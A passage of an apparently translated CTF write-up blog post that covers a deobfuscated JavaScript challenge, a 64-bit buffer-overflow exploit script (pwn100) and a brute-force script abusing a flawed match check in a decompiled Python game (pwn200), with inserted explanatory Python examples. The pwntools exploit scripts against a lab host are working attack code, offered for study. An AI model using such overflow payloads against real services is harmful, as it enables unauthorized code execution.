$$._$+$$$.$$_$+$$$.$$$_+"\"+$$$.__$+$$$.$$_+$$$._$_+"\"+$$$.$__+$$$.___+"\"+$$$.__$+$$$._$_+$$$._$$+$$$._+$$$.$$__+"\"+$$$.__$+$$$.$_$+$$$._$$+"\"+$$$.__$+$$$.$$_+$$$._$$+"}\");"+""")())();

By the look of it this is JS again, so I ran it in the console of the 360 browser and got FLAG{JS Encoder Sucks}
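The brute-force table finds exactly one preimage per ciphertext byte because the map is a bijection on 0..255 (0xb1 is odd). An added example (Python 3.8+, not the author's script) that mirrors the JS encrypt(), builds the table both by search and from the inverse of 0xb1 mod 256, and round-trips a constructed sample; the function names are assumptions.

```python
# Added example: the per-character map from the challenge's encrypt(),
# its lookup table built two ways, and a round trip on a constructed sample.
import json

MUL, ADD = 0xB1, 0x1B  # constants taken from the formatted JS above


def encrypt(code):
    """Python mirror of the JS encrypt() followed by JSON.parse().

    Each character code is mapped to (e*MUL + ADD) & 0xff and written as a
    \\uXXXX escape; parsing the quoted result yields one character per byte.
    Only characters with codes 0..255 survive the & 0xff without loss.
    """
    body = "".join("\\u%04x" % ((ord(ch) * MUL + ADD) & 0xFF) for ch in code)
    return json.loads('"' + body + '"')


def brute_force_table():
    """table[c] = first byte p with (p*MUL + ADD) & 0xff == c (search, as in the page's script)."""
    table = {}
    for p in range(256):
        table.setdefault((p * MUL + ADD) & 0xFF, p)
    return table


def closed_form_table():
    """Same table from p = (c - ADD) * MUL^-1 mod 256; the inverse exists because MUL is odd."""
    inv = pow(MUL, -1, 256)
    return {c: ((c - ADD) * inv) & 0xFF for c in range(256)}


def decrypt(crypted):
    """Invert encrypt() for a string whose characters all have codes 0..255."""
    table = closed_form_table()
    return "".join(chr(table[ord(ch)]) for ch in crypted)


SAMPLE = 'console.log("constructed sample")'  # constructed input

if __name__ == "__main__":
    print(brute_force_table() == closed_form_table())
    print(decrypt(encrypt(SAMPLE)))
```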

Pwn

0x10 pwn100

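I am pretty weak at this, so I only got one pwn challenge. This one requires sending a payload and, based on the returned address, guessing the number of bytes needed to overwrite up to ret; note that it is 64-bit.

The script is as follows: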

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
from pwn import *
io = remote('10.4.21.55',9001)
io.recvuntil("0x")
sys_addr = int(io.recv()[:12],16)
payload = 'f' * 56

payload += p64(sys_addr)

io.sendline(payload)
io.interactive()

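0x11 pwn200 (worked out after the contest; noted here for the record)

First scan it with DIE (or run file + the file name in a Linux environment), as shown in the figure.

It is a pyc file; decompiling it with an online tool gives the following code: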

#!/usr/bin/env python
# encoding: utf-8
# Visit http://tool.lu/pyc/ for more information
__Auther__ = 'M4x'
from string import printable
from random import choice
from os import system
from sys import stdin, stdout, stderr
from termios import tcflush, TCIFLUSH
from time import sleep
dic = list(printable)

def Flush():
    stdout.write('stdout1')
    stderr.write('stderr1')
    stderr.write('stderr1')


def Help():
    print '\n\n'
    print 'M4x will give you 6 random printable chars'
    print 'And you are supposed to match all the chars'
    print 'If you match all the chars successfully, flag will goes to you'
    print 'Good luck!'
    print '\n\n'


def Play():
    tcflush(stdin, TCIFLUSH)
    submit = raw_input('Give me your 6 chars: ')
    if len(submit) != 6:
        print 'Error length'
        return None
    lotto = [None] * 6
    for i in xrange(6):
        lotto[i] = choice(dic)
    
    match = 0
    for i in xrange(6):
        for j in xrange(6):
            if lotto[i] == submit[j]:
                match += 1
                continue
    
    if match == 6:
        system('cat flag')
    else:
        print 'Have a nice day'

if __name__ == '__main__':
    while True:
        print '[*]Select menu'
        print '[*]1. Play Game'
        print '[*]2. Seek Help'
        print '[*]3. Exit'
        menu = input('Your choice: ')
        if menu == 1:
            Play()
            continue
        if menu == 2:
            Help()
            continue
        if menu == 3:
            print 'See you!'
            break
            continue
        print 'Invald menu'

A pwn challenge is of course about finding the vulnerability, and the key part is here:

    for i in xrange(6):
        for j in xrange(6):
            # lotto is a randomly generated string of length 6; submit is our input
            if lotto[i] == submit[j]:
                match += 1
                continue

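As can be seen, each element of lotto is compared against every element of submit, and match is incremented on every hit. So the submit we send only needs to be a string whose 6 elements are all the same; after that it is just a matter of sending the payload over and over.

The script is as follows: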

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
from pwn import *
io = remote('10.4.21.55',9002)
payload = 'a'*6
while(1):
	io.recvuntil('choice: ')
	io.sendline('1')
	io.recvuntil("chars: ")
	io.sendline(payload)
	str = io.recvline()
	print str
io.interactive()
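The flawed check described above beside a position-wise one, as an added example (Python 3, not the challenge's or the author's code). The function names and sample draws are constructed; the last function computes exactly how often the nested-loop check accepts a submission of six identical characters.

```python
# Added example: the nested-loop match count from the decompiled Play(),
# a position-wise replacement, and the exact acceptance probability.
import hmac
import secrets
from fractions import Fraction
from string import printable


def flawed_match(lotto, submit):
    """Count as the challenge does: every lotto[i] against every submit[j]."""
    match = 0
    for i in range(6):
        for j in range(6):
            if lotto[i] == submit[j]:
                match += 1
    return match


def flawed_accepts(lotto, submit):
    """Acceptance rule of the challenge: length 6 and a match count of exactly 6."""
    return len(submit) == 6 and flawed_match(lotto, submit) == 6


def hardened_accepts(lotto, submit):
    """Accept only when submit equals the draw position by position.

    hmac.compare_digest compares the two byte strings in constant time and
    returns False when their lengths differ.
    """
    return hmac.compare_digest("".join(lotto).encode(), submit.encode())


def draw():
    """Six characters drawn with a CSPRNG instead of random.choice."""
    return [secrets.choice(printable) for _ in range(6)]


def flawed_acceptance_probability():
    """P(flawed check accepts six identical characters).

    The count is 6 * (number of lotto slots equal to that character), so it
    equals 6 exactly when one slot out of six matches: 6 * (1/k) * ((k-1)/k)^5
    with k = len(printable).
    """
    k = len(printable)
    return 6 * Fraction(1, k) * Fraction(k - 1, k) ** 5


def position_wise_probability():
    """P(a single guess equals the whole draw) under the position-wise check."""
    return Fraction(1, len(printable) ** 6)


if __name__ == "__main__":
    sample = list("aXYZ12")  # constructed draw containing 'a' once
    print(flawed_accepts(sample, "aaaaaa"), hardened_accepts(sample, "aaaaaa"))
    print(float(flawed_acceptance_probability()), float(position_wise_probability()))
```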

Challenge source: Islab
Challenge link: https://pan.baidu.com/s/1eSpQ9qi
Password: 4jlf

Author: LB919

Source: http://www.cnblogs.com/L1B0/

If you repost this, I would be honored! Please credit the source.

Original URL: https://www.cnblogs.com/L1B0/p/8097386.html